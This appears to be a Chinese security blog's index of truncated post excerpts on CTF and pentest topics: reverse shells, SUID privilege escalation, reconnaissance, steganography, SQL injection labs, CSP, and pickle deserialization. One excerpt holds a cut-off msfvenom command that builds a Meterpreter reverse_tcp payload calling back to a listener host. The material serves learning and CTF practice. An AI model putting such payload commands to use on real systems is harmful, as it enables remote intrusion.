# Meterpreter
# reverse_shell
# reverse_tcp
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=44...
# SUID 提权
suid (set uid) 是 linux 中的一种特殊权限,suid 可以让调用者以文件拥有者身份运行该文件,所以利用 suid 提权的核心就是运行 root 用户所拥有的 suid 的文件,那么运行该文件的时候就得获得 ro...
# Passive Reconnaissance
# Whois
WHOIS 信息查询 - 站长工具 (wujingquan.com)
kali 上:
# nslookup and dig
Query type 查询类型
Result 结果...
# MISC—Picture
一键梭哈网站:https://aperisolve.fr/
# 盲水印隐写
一张图片的情况
可以使用 隐形水印工具 V1.2 或者 WaterMark 来提取水印
两张图片的情况
123先把要处理的图片拉入BlindW...
CTF—MISC
[!IMPORTANT]
参考Lunatic师傅的文章:https://goodlunatic.github.io/posts/1ad9200
⚠👆👆👆👆👆⚠
加密/编码base123456789101112...
portswigger靶场 SQL注入SQL injection cheat sheet | Web Security Academy (portswigger.net)
SQL injection - Fc04dB’s BLOG
🧪实验1:W...
# MISC03
wireshark 打开数据包
全局搜索响应码为 200 的包第三步:经过很多尝试找出正确 ip:
下面记事本是赛题下线之前的记录,重新上线后一个一个尝试发现正确 flag
也可以通过脚本提取所有 ip 然后一个一个试
12345...
# 内容安全策略(CSP)
# 同源策略
同源策略(Same origin policy)是一种约定
是浏览器的行为,是为了保护本地数据不被 JavaScript 代码获取回来的数据污染,因此拦截的是客户端发出的请求回来的数据接收,即请求发送了,服务...
# DASCTF 2024 十月赛
# ezlogin
EditController.edit 中 /editPass 路由接受用户输入的 newPass
UserUtil.changePassword 方法用到了 newPass 参数:
并且是...
# pickle
pickle 是 Python 的一个库,可以对一个对象进行序列化和反序列化操作。其中 __reduce__ 魔法函数会在一个对象被反序列化时自动执行,我们可以通过在 __reduce__ 魔法函数内植入恶意代码的方式进行任意命令执...